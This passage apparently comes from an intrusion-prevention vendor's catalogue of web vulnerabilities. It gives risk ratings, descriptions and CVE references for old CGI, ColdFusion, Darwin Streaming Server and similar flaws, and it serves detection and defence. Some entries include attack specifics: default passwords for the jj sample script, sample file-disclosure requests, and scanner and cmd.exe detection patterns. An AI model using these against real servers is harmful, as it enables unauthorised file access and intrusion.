Moderate

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

PerlCal

Type:

Directory Traversal

Description:

PerlCal is a web-based calendar software. In some versions there exists a directory traversal vulnerability that allows a remote attacker to read arbitrary files.

References:

CVE-2001-0463
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0463

BID-2663
http://www.securityfocus.com/bid/2663

HTTP-Cgi-CGIForum-Dir-Traversal

About this vulnerability:

Directory traversal vulnerability in CGIForum 1.0

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Markus Triska CGIForum

Type:

Malfunction

Description:

The cgiforum.pl script in CGIForum 1.0 does not properly validate the input given in the 'thesection' parameter. A remote attacker can use directory traversal as an argument to this parameter to read arbitrary files on the target system.

References:

CVE-2000-1171
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1171

BID-1963
http://www.securityfocus.com/bid/1963

HTTP-Cgi-DCForum-Command-Execution

About this vulnerability:

Command execution vulnerability in DCForum

Risk:

Moderate

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

DC Scripts DCForum

Type:

Malfunction

Description:

DC Scripts DCForum has a vulnerability in the handling of user-supplied input. This vulnerability allows a remote attacker to execute arbitrary commands by uploading a Perl program to the server and using directory traversal to reference it.

References:

CVE-2001-0436
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0436

BID-2611
http://www.securityfocus.com/bid/2611

OSVDB-3862
http://www.osvdb.org/3862

HTTP-Cgi-Document.D2W-Information-Disclosure

About this vulnerability:

Document.d2w Information Disclosure

Risk:

Low

First detected in:

sgpkg-ips-53-1210

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

IBM Net.Data

Type:

Malfunction

Description:

A specially-crafted URL causes the scripting engine to print the path of its configuration files. This information may used to launch new, more severe attacks.

References:

CVE-2000-1110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1110

BID-2017
http://www.securityfocus.com/bid/2017

HTTP-Cgi-FormMail-Command-Execution

About this vulnerability:

Command execution vulnerability in FormMail

Risk:

Moderate

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Matt Wright FormMail

Type:

Malfunction

Description:

FormMail has a vulnerability in the verification of 'recipient' hidden field of the form-based input. A remote attacker is able to use this vulnerability to execute arbitrary commands on the web server.

Situation:

HTTP_CRL-FormMail-Command-Execution

References:

CVE-1999-0172
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0172

BID-2079
http://www.securityfocus.com/bid/2079

HTTP-Cgi-HTDig_File_Disclosure

About this vulnerability:

File disclosure vulnerability in htdig

Risk:

Low

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Unix

Software:

htdig

Type:

Malfunction

Description:

The 'htsearch' script in ht://Dig has a vulnerability that allows a remote attacker to gain read access on arbitrary files by specifying the wanted file in a script parameter.

References:

CVE-2000-0208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0208

BID-1026
http://www.securityfocus.com/bid/1026

HTTP-Cgi-Jj-Sys-Compromise

About this vulnerability:

System compromise via CGI script /cgi-bin/jj

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Insecure Configuration

Description:

A sample CGI program /cgi-bin/jj in Apache Web Server passes user data to the /bin/mail program. This feature can be used to escape into a shell using the '~' character on systems where /bin/mail allows this. A password is requested from the attacker but the program has a hard coded default password HTTPdRocKs or SDGROCKS.

Situation:

HTTP_CSU-Sample-Cgi-Jj-Access

References:

CVE-1999-0260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0260

BID-2002
http://www.securityfocus.com/bid/2002

HTTP-Cgi-Metertek-Pagelog.cgi-Directory-Traversal-Vulnerability

About this vulnerability:

File disclosure in Metertek pagelog.cgi

Risk:

Moderate

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Metertek pagelog.cgi

Type:

Directory Traversal

Description:

The application insufficiently checks "../" sequences in file/pathnames, making it possible for an attacker to read files with ".log" extensions that the server process has access to. It is also possible to create and overwrite files with extension ".log" and ".txt".

References:

CVE-2000-0940
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0940

BID-1864
http://www.securityfocus.com/bid/1864

HTTP-Cgi-Nortel-Contivity-cgiproc-DoS

About this vulnerability:

Cgi script on Nortel Contivity vulnerable to metacharacter injection

Risk:

Low

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Other

Software:

NCSA HTTPd; Apache

Type:

Metacharacter Injection

Description:

The administration webserver of the switch includes a cgi program "cgiproc", which incorrectly handles metacharacters. An attacker who is capable of connecting to the switch can exploit this vulnerability to crash the switch.

Situation:

HTTP_CSU-Cgi-Nortel-Contivity-cgiproc-DoS

References:

CVE-2000-0064
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0064

BID-938
http://www.securityfocus.com/bid/938

OSVDB-7583
http://www.osvdb.org/7583

HTTP-Cgi-Nortel-Contivity-cgiproc-File-Disclosure

About this vulnerability:

File disclosure vulnerability in cgiproc script

Risk:

Low

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1637-5242

Platform:

Other

Software:

NCSA HTTPd; Apache

Type:

Malfunction

Description:

The administration webserver of the switch includes a cgi program "cgiproc", which does not filter input correctly. Remote attackers may read arbitrary files from the switch by specifying the filename in a parameter sent to the script.

References:

CVE-2000-0063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0063

BID-938
http://www.securityfocus.com/bid/938

HTTP-Cgi-Nph-Maillist

About this vulnerability:

Nph-maillist

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

nph-maillist.pl

Type:

Input Validation

Description:

Nph-maillist software allows the execution of commands in the e-mail address. This can be exploited for remote control of the victim host.

Situation:

HTTP_CRL-Nph-Maillist

References:

CVE-2001-0400
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0400

BID-2563
http://www.securityfocus.com/bid/2563

HTTP-Cgi-story-Pl-Directory-Traversal

About this vulnerability:

Story.pl directory traversal vulnerability

Risk:

Low

First detected in:

sgpkg-ips-4-1102

Last changed:

sgpkg-ips-1639-5242

Platform:

Generic

Software:

Valerie Mates Interactive Story

Type:

Directory Traversal

Description:

The application doesn't properly filter contents of the hidden field "next". By supplying a relative path as an argument for that field the attacker may read any file the webserver process can access.

Situation:

HTTP_CS-Cgiemail-Encoded-Newline-Spam-Proxy

References:

CVE-2001-0804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0804

BID-3028
http://www.securityfocus.com/bid/3028

OSVDB-683
http://www.osvdb.org/683

HTTP-Cgi-Webplus-File-Disclosure

About this vulnerability:

File disclosure via webplus CGI script

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

TalentSoft Web+

Type:

Malfunction

Description:

With some versions of TalentSoft Web+ software, there exists a vulnerability in the argument validation of the webplus CGI script. This vulnerability may allow an attacker to read or execute arbitrary files on the victim system.

References:

BID-1722
http://www.securityfocus.com/bid/1722

HTTP-Cgi-WWWWAIS-BOF

About this vulnerability:

Buffer overflow in wwwwais CGI script

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

wwwwais

Type:

Malfunction

Description:

The wwwwais CGI program is a Web front-end for WAIS query tools. The script has a buffer overflow vulnerability in the QUERY_STRING argument handling in HTTP GET. Remote attacker can exploit this vulnerability to execute arbitrary commands on the target system.

References:

CVE-2001-0223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0223

HTTP-Cgiemail-Encoded-Newline-Spam-Proxy

About this vulnerability:

Cgiemail does not filter encoded newlines, allowing changes to the email header data.

Risk:

Moderate

First detected in:

sgpkg-ips-12-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT cgiemail

Type:

Malfunction

Description:

MIT cgiemail does not parse encoded newline characters (%0a) from input, which allows remote attackers to use it as a spam proxy. The vulnerability can be exploited by taking a predefined variable and including an encoded newline character into it followed by additional fields, which will be decoded by sendmail when generating the message, for example CC: and BCC:.

Situation:

References:

CVE-2002-1575
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1575

BID-5013
http://www.securityfocus.com/bid/5013

HTTP-CGIScript.net-csChatRBox.cgi-Eval-Perl-Code-Execution

About this vulnerability:

Perl code execution vulnerability in the CGIScript.net csChatRBox.cgi

Risk:

High

First detected in:

sgpkg-ips-89-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CGIScript.net csChatRBox

Type:

Code Injection

Description:

There is a Perl code execution vulnerability in CGIScript.net's csChatRBox.cgi script. A remote attacker can exploit this vulnerability to run arbitrary code on the server.

Situation:

HTTP_CSU-CGIScript-csChatRBox-System-Compromise

References:

CVE-2002-1752
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1752

BID-4452
http://www.securityfocus.com/bid/4452

HTTP-CGIScript.net-csGuestbook-Eval-Perl-Code-Execution

About this vulnerability:

Perl code execution vulnerability in the CGIScript.net csGuestbook

Risk:

High

First detected in:

sgpkg-ips-89-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CGIScript.net csGuestbook

Type:

Code Injection

Description:

There is a Perl code execution vulnerability in CGIScript.net csGuestbook 1.0's csGuestbook.cgi script. A remote attacker can exploit this vulnerability to run arbitrary code on the server.

Situation:

HTTP_CSU-CGIScript-csGuestbook-System-Compromise

References:

CVE-2002-1750
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1750

BID-4448
http://www.securityfocus.com/bid/4448

HTTP-CGIScript.net-csLiveSupport.cgi-Eval-Perl-Code-Execution

About this vulnerability:

Perl code execution vulnerability in the CGIScript.netcsLiveSupport.cgi

Risk:

High

First detected in:

sgpkg-ips-89-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CGIScript.net csLiveSupport

Type:

Code Injection

Description:

There is a Perl code execution vulnerability in CGIScript.net's csLiveSupport.cgi script. A remote attacker can exploit this vulnerability to run arbitrary code on the server.

Situation:

HTTP_CSU-CGIScript-csLiveSupport-System-Compromise

References:

CVE-2002-1751
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1751

BID-4450
http://www.securityfocus.com/bid/4450

HTTP-CGIScript.net-csMailto-Cgi-System-Compromise

About this vulnerability:

System compromising vulnerability in csMailto.cgi

Risk:

High

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

CGIScript.net csMailto

Type:

Malfunction

Description:

The csMailto script stores all of its configuration data in hidden form fields. Remote attackers can exploit the script by sending suitable arguments to csMailto.cgi. The script can be exploited to execute commands on the server, send mail and download logged form input.

References:

CVE-2002-0749
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0749

BID-4579
http://www.securityfocus.com/bid/4579

HTTP-CGIScript.net-csNews.cgi-Eval-Perl-Code-Execution

About this vulnerability:

Perl code execution vulnerability in the CGIScript.net csNews.cgi

Risk:

Moderate

First detected in:

sgpkg-ips-89-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CGIScript.net csNews

Type:

Code Injection

Description:

There is a Perl code execution vulnerability in CGIScript.net's csNews.cgi script. A remote attacker can exploit this vulnerability to run arbitrary code on the server.

Situation:

HTTP_CSU-CGIScript-csNews-System-Compromise

References:

CVE-2002-1750
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1750

BID-4448
http://www.securityfocus.com/bid/4448

HTTP-CGIScript.net-csNewsPro.cgi-Eval-Perl-Code-Execution

About this vulnerability:

Perl code execution vulnerability in the CGIScript.net csNewsPro.cgi

Risk:

High

First detected in:

sgpkg-ips-89-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CGIScript.net csNewsPro

Type:

Code Injection

Description:

There is a Perl code execution vulnerability in CGIScript.net's csNewsPro.cgi script. A remote attacker can exploit this vulnerability to run arbitrary code on the server.

Situation:

HTTP_CSU-CGIScript-csNewsPro-System-Compromise

References:

CVE-2002-1753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1753

BID-4451
http://www.securityfocus.com/bid/4451

HTTP-CGIScript.net-csSearch.cgi-Eval-Perl-Code-Execution

About this vulnerability:

Perl code execution vulnerability in the CGIScript.net csSearch.cgi

Risk:

High

First detected in:

sgpkg-ips-89-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CGIScript.net csSearch

Type:

Code Injection

Description:

There is a Perl code execution vulnerability in CGIScript.net's csSearch.cgi script. A remote attacker can exploit this vulnerability to run arbitrary code on the server.

Situation:

HTTP_CSU-CGIScript-csSearch-System-Compromise

References:

CVE-2002-0495
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0495

BID-4368
http://www.securityfocus.com/bid/4368

HTTP-CGIScript_Net_csNews_Database_Information_Disclosure

About this vulnerability:

Cgiscript.net's csNews script allows remote users to get database files

Risk:

Low

First detected in:

sgpkg-ips-16-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CGIScript.net csNews

Type:

Malfunction

Description:

Cgiscript.net's csNews script allows remote users to get database files by requesting them through the browser: csNews.cgi?database=default%2edb.

Situation:

HTTP_CSU-CGIScript-csNews-Database-Information-Disclosure

References:

CVE-2002-0922
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0922

BID-4991
http://www.securityfocus.com/bid/4991

HTTP-CGIScript_Net_csNews_Path_Disclosure

About this vulnerability:

CGIScript.net's csNews script allows remote users to view the full server pathname

Risk:

Low

First detected in:

sgpkg-ips-16-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CGIScript.net csNews

Type:

Malfunction

Description:

CGIScript.net's csNews script allows remote users to view the full server pathname and other potentially sensitive configuration information by requesting an invalid database.

Situation:

HTTP_CSU-CGIScript-csNews-Path-Disclosure

References:

CVE-2002-0921
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0921

HTTP-CGIWrap-JavaScript-Execution

About this vulnerability:

JavaScript execution vulnerability in CGIWrap

Risk:

Moderate

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Nathan Neulinger CGIWrap

Type:

Javascript Injection

Description:

Nathan Neulinger CGIWrap has a cross-site scripting vulnerability that enables execution of malicious JavaScript in web clients. An attacker is able to submit a malicious link into a web form that is viewable by other users. If user clicks the link the embedded JavaScript is then executed on the user's web client.

Situation:

HTTP_CRL-CGIWrap-JavaScript-Execution-Attempt

References:

CVE-2001-0987
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0987

BID-3084
http://www.securityfocus.com/bid/3084

OSVDB-1909
http://www.osvdb.org/1909

HTTP-Chetcpasswd-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Chetcpasswd allows shadow file disclosure

Risk:

Moderate

First detected in:

sgpkg-ips-113-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Chetcpasswd

Type:

Buffer Overflow

Description:

Version 1.12 of the Chetcpasswd cgi script suffers from a buffer overflow vulnerability that allows remote attackers to view the local shadow file. The vulnerability can be triggered by sending an overly long string as the 'user' URI parameter.

Situation:

HTTP_CRL-Chetcpasswd-Buffer-Overflow

References:

CVE-2002-2219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2219

BID-6472
http://www.securityfocus.com/bid/6472

HTTP-Cisco-Double-Percentage-Url-DoS

About this vulnerability:

Cisco Double Percentage Url DoS

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Cisco IOS

Software:

<os>

Type:

Malfunction

Description:

Cisco IOS routers running webservers contain a vulnerability which allows the attacker to cause a denial of service.

References:

CVE-2000-0380
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0380

BID-1154
http://www.securityfocus.com/bid/1154

OSVDB-1302
http://www.osvdb.org/1302

HTTP-Citrix-Presentation-Server-Client-ActiveX-Control-Buffer-Overflow

About this vulnerability:	ICA Client ActiveX control provided in the Citrix Presentation Server suffers from a buffer overflow vulnerability in its parameter handling.
Risk:	Moderate
First detected in:	sgpkg-ips-86-1314
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Citrix Presentation Server
Type:	Input Validation
Description:	ICA Client ActiveX control provided in the Citrix Presentation Server suffers from a buffer overflow vulnerability in its parameter handling.
Situation:	HTTP_Citrix-Presentation-Server-Client-ActiveX-Control-Buffer-Overflow File-Text_Citrix-Presentation-Server-Client-ActiveX-Control-Buffer-Overflow

HTTP-Clamav-libclamav-PE-File-Handling-Integer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Clam AntiVirus

Risk:

Moderate

First detected in:

sgpkg-ips-147-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ClamAV

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Clam AntiVirus. By delivering a crafted PE file to the scanning service, an unauthenticated attacker can execute arbitrary code with the privileges of the affected ClamAV daemon.

Situation:

HTTP_SS-Clamav-libclamav-PE-File-Handling-Integer-Overflow
File-Exe_Clamav-libclamav-PE-File-Handling-Integer-Overflow

References:

CVE-2008-0318
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0318

BID-27751
http://www.securityfocus.com/bid/27751

HTTP-Cmd-Exe-System-Compromise

About this vulnerability:	Windows cmd.exe access
Risk:	High
First detected in:	sgpkg-ips-5-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Generic HTTP server
Type:	Malfunction
Description:	Windows exploits may attempt to access cmd.exe.
Situation:	HTTP_CSU-Cmd-Exe-System-Compromise HTTP_CS-Directory-Traversal-Cmd-Exe-System-Compromise

HTTP-Code-Injection-Attack-Tool

About this vulnerability:	HTTP Injection Attack Tool
Risk:	High
First detected in:	sgpkg-ips-336-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Code Injection
Description:	Certain attack tools can be identified on basis of the User-Agent they use. This vulnerability is reserved for those.
Situation:	HTTP_CSH-Mama-Casper-Attack-Tool-Detected HTTP_CSH-TSL-Attack-Tool-Detected

HTTP-ColdFusion-Admin-Password-DoS

About this vulnerability:

Denial-of-service attack possible against ColdFusion

Risk:

Moderate

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ColdFusion

Type:

Malfunction

Description:

A very long password submitted to the administrator login in Allaire ColdFusion Server can result in the application halting. The default login page does not allow long passwords, but a denial-of-service attack can be done by posting a password of over 40,000 characters to the server.

Situation:

HTTP_CSH-ColdFusion-Admin-Password-DoS

References:

CVE-2000-0538
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0538

BID-1314
http://www.securityfocus.com/bid/1314

OSVDB-3399
http://www.osvdb.org/3399

HTTP-ColdFusion-Exprcalc-File-Disclosure

About this vulnerability:

ColdFusion's sample application allows file operations

Risk:

Moderate

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1641-5242

Platform:

Generic

Software:

ColdFusion

Type:

Malfunction

Description:

A sample application distributed with Allaire ColdFusion Server, The Expression Evaluator, allows arbitrary files to be read and deleted from the server. Remote attackers can exploit the vulnerability by passing suitable arguments to Exprcalc.cfm.

Situation:

HTTP_CSU-ColdFusion-Path-Information-Disclosure
HTTP_CSU-ColdFusion-Exprcalc-File-Disclosure

References:

CVE-1999-0455
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0455

BID-115
http://www.securityfocus.com/bid/115

HTTP-ColdFusion-Openfile-File-Import

About this vulnerability:

openfile.cfm allows arbitrary files to be uploaded

Risk:

Moderate

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ColdFusion

Type:

Malfunction

Description:

A sample application distributed with Allaire ColdFusion Server, The Expression Evaluator, allows arbitrary files to be uploaded to the server by passing suitable arguments to openfile.cfm.

Situation:

HTTP_CSU-ColdFusion-Openfile-File-Import

References:

CVE-1999-0477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0477

BID-115
http://www.securityfocus.com/bid/115

HTTP-ColdFusion-Path-Information-Disclosure

About this vulnerability:

application.cfm and onrequestend.cfm output their full pathname.

Risk:

Low

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ColdFusion

Type:

Malfunction

Description:

Application.cfm and Onrequestend.cfm in ColdFusion Server 4.x return an error message containing the file's full pathname. This information can help remote attackers.

Situation:

HTTP_CSU-ColdFusion-Path-Information-Disclosure

References:

CVE-2000-0189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0189

BID-1021
http://www.securityfocus.com/bid/1021

HTTP-CPanel-Multiple-Cross-Site-Scripting-Vulnerabilities

About this vulnerability:

Many XSS vulnerabilities in cPanel

Risk:

Low

First detected in:

sgpkg-ips-105-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

cPanel

Type:

Cross-site Scripting

Description:

cPanel 9.1.0-R85 suffers from multiple cross-site scripting vulnerabilities. Exploiting these allows remote attackers to steal credentials from victims who follow crafted links to a cPanel site.

Situation:

HTTP_CRL-CPanel-Multiple-Cross-Site-Scripting-Vulnerabilities

References:

CVE-2004-1875
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1875

BID-10002
http://www.securityfocus.com/bid/10002

OSVDB-4243
http://www.osvdb.org/4243

OSVDB-4215
http://www.osvdb.org/4215

OSVDB-4214
http://www.osvdb.org/4214

OSVDB-4213
http://www.osvdb.org/4213

OSVDB-4212
http://www.osvdb.org/4212

OSVDB-4211
http://www.osvdb.org/4211

OSVDB-4210
http://www.osvdb.org/4210

OSVDB-4209
http://www.osvdb.org/4209

OSVDB-4208
http://www.osvdb.org/4208

HTTP-Creative-Software-AutoUpdate-Engine-ActiveX-Control-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the Creative Software AutoUpdate Engine ActiveX Control

Risk:

High

First detected in:

sgpkg-ips-157-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Creative Software AutoUpdate

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Creative Software AutoUpdate Engine ActiveX Control. A successful attack results in a denial of service condition or non-privileged arbitrary code execution.

Situation:

HTTP_SS-Creative-Software-AutoUpdate-Engine-ActiveX-Control-Buffer-Overflow
File-Text_Creative-Software-AutoUpdate-Engine-ActiveX-Control-Buffer-Overflow

References:

CVE-2008-0955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0955

BID-29391
http://www.securityfocus.com/bid/29391

OSVDB-45655
http://www.osvdb.org/45655

HTTP-Crystal-Reports-File-Removal

About this vulnerability:

File disclosure / removal vulnerability in Crystal Reports

Risk:

Moderate

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Crystal Reports

Type:

Directory Traversal

Description:

Business Objects' Crystal Reports allows remote attackers to view and delete arbitrary files from the server. The vulnerability can be exploited by specifying a filename as the argument to the dynamicimage parameter.

Situation:

HTTP_CS-Crystal-Reports-File-Removal

References:

CVE-2004-0204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0204

BID-10260
http://www.securityfocus.com/bid/10260

OSVDB-6748
http://www.osvdb.org/6748

MS04-017
http://technet.microsoft.com/security/bulletin/MS04-017

HTTP-CS_Icecast-Server-Authurl-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Icecast

Risk:

Low

First detected in:

sgpkg-ips-1119-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Icecast

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability has been reported in the Icecast server. The vulnerability is due to improper offset calculations while copying user-supplied data into a stack-based buffer within url_add_client in auth_url.c. A remote, unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted HTTP request to the target server. Successful exploitation could potentially lead to arbitrary code execution.

Situation:

HTTP_CS-Icecast-Server-Authurl-Stack-Buffer-Overflow

References:

CVE-2018-18820
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18820

HTTP-Darwin-Streaming-Server-DoS

About this vulnerability:

Denial-of-service vulnerability in Darwin Streaming Server

Risk:

Moderate

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1637-5242

Platform:

Windows

Software:

Apple QuickTime; Darwin Streaming Server

Type:

Malfunction

Description:

Apple QuickTime / Darwin Streaming Server before 4.1.3f can be exploited by sending a http request to view_broadcast.cgi without the required parameters. No new connections will be allowed to the server after this request, permiting remote attackers to deny service.

References:

CVE-2003-0422
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0422

HTTP-Darwin-Streaming-Server-Dot-Dot-Slash-Msdos-Device-Name-DoS

About this vulnerability:

Denial of Service (DoS) vulnerability in Darwin Streaming Server

Risk:

Low

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Apple QuickTime; Darwin Streaming Server

Type:

Malfunction

Description:

Apple QuickTime / Darwin Streaming Server before 4.1.3g can be exploited by requesting a MS-DOS device name prefixed by ../ over HTTP from the server. This is a variant of CVE-2003-0421.

Situation:

HTTP_CS-Darwin-Streaming-Server-Dot-Dot-Slash-Msdos-Device-Name-DoS

References:

CVE-2003-0502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0502

HTTP-Darwin-Streaming-Server-Msdos-Device-Name-DoS

About this vulnerability:

Denial of Service (DoS) vulnerability in Darwin Streaming Server

Risk:

Low

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Apple QuickTime; Darwin Streaming Server

Type:

Malfunction

Description:

Apple Quicktime / Darwin Streaming Server before 4.1.3e can be exploited by requesting a MS-DOS device name over HTTP from the server. A HTTP 404 error message is returned for the request, but no further requests are served.

Situation:

HTTP_CSU-Darwin-Streaming-Server-Parse-Xml-File-Disclosure

References:

CVE-2003-0421
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0421

HTTP-Darwin-Streaming-Server-Parse-Xml-File-Disclosure

About this vulnerability:

File disclosure vulnerability in Darwin Streaming Server

Risk:

Low

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Apple QuickTime; Darwin Streaming Server

Type:

Malfunction

Description:

Apple Quicktime / Darwin Streaming Server before 4.1.3g can be exploited by requesting /parse_xml.cgi?filename=[file], which returns the contents of [file]. This vulnerability can be used to view the source code of script files.

Situation:

References:

CVE-2003-0423
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0423

HTTP-Data-URI-In-Redirect

About this vulnerability:	A suspicious HTTP redirect
Risk:	Moderate
First detected in:	sgpkg-ips-506-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Insecure Configuration
Description:	A data URI was seen in an HTTP redirect.
Situation:	HTTP_SHS-Data-URI-In-Redirect

HTTP-DFind-Scanner

About this vulnerability:	DFind Scanner Attack Tool
Risk:	Moderate
First detected in:	sgpkg-ips-505-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	DFind
Type:	Browser
Description:	DFind Scanner is an attack tool that is designed to exploit website-related PHP vulnerabilities. DFind sometimes identifies itself by starting the scan with a request to URI that starts with "/w00tw00t".
Situation:	HTTP_CSU-DFind-Scanner-Usage

HTTP-Directory-Php-Command-Execution

About this vulnerability:

directory.php Command Execution

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

PHP

Type:

Metacharacter

Description:

The directory.php can be tricked into executing arbitary commands with the privileges of the user 'nobody'.

Situation:

HTTP_CRL-Directory-Php-Vulnerability-Access

References:

CVE-2002-0434
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0434

BID-4278
http://www.securityfocus.com/bid/4278

HTTP-Diva-ISDN-Password-BOF

About this vulnerability:

Diva ISDN Password BOF

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Other

Software:

<os>

Type:

Buffer Overflow

Description:

The DIVA Lan ISDN modem contains a vulnerability which allows an attacker to deny all access to the modem and require a reboot to return to normal status.

Situation:

HTTP_CS-Diva-ISDN-Password-BOF

References:

CVE-1999-1533
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1533

BID-665
http://www.securityfocus.com/bid/665

HTTP-Domino-Access

About this vulnerability:	Access to IBM Domino Server
Risk:	Low
First detected in:	sgpkg-ips-793-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	IBM Domino
Type:	Insecure Configuration
Description:	Suspicious IBM Domino Access detected.
Situation:	HTTP_CSU-IBM-Domino-Access

HTTP-Download-Cgi-Directory-Traversal

About this vulnerability:

Directory traversal vulnerability in Matt Wrights download.cgi

Risk:

Low

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1637-5242

